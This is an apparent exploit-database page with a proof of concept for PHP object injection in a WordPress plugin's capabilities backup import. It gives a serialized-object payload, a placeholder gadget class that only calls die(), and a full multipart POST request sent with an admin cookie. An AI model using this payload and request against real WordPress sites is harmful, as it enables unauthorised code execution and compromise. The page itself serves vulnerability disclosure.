Share
## https://sploitus.com/exploit?id=WPEX-ID:72639924-E7A7-4F7D-BD50-015D05FFD4FB
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Create a file named settings.json with the following content and import if: O:4:"Evil":0:{};
POST /wp-admin/admin.php?page=pp-capabilities-backup HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=pp-capabilities-backup
Content-Type: multipart/form-data; boundary=---------------------------293588204025713533762090348603
Content-Length: 1198
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="_wpnonce"
9ca77a826e
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin.php?page=pp-capabilities-backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"
user_roles
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"
capsman_editor_features_backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"
capsman_admin_features_backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="import_file"; filename="capabilities-export-2022-09-27_3-28-28_am.json"
Content-Type: application/json
O:4:"Evil":0:{};
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="import_backup"
Import
-----------------------------293588204025713533762090348603--